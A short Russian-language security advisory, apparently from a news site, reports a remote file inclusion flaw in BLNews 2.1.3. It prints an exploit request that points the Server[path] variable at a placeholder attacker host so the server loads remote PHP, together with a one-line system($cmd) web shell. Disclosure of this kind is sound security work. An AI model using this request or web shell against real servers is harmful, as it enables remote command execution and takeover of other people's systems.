Уязвимость включения файлов обнаружена в BLNews. Удаленный пользователь может выполнить произвольный PHP код, включая команды операционной системы, на целевом сервере. 

DWC Gr0up сообщает, что сценарий admin/objects.inc.php4 использует переменную $Server[path], но не определяет эту переменную. Удаленный пользователь может представить значение для этой переменной, ссылающееся на сценарий, расположенный на удаленном сервере, который будет выполнен на целевом сервере. Пример: 

admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
with
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4
with
<? system($cmd) ?>

Уязвимость обнаружена в BLNews 2.1.3.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии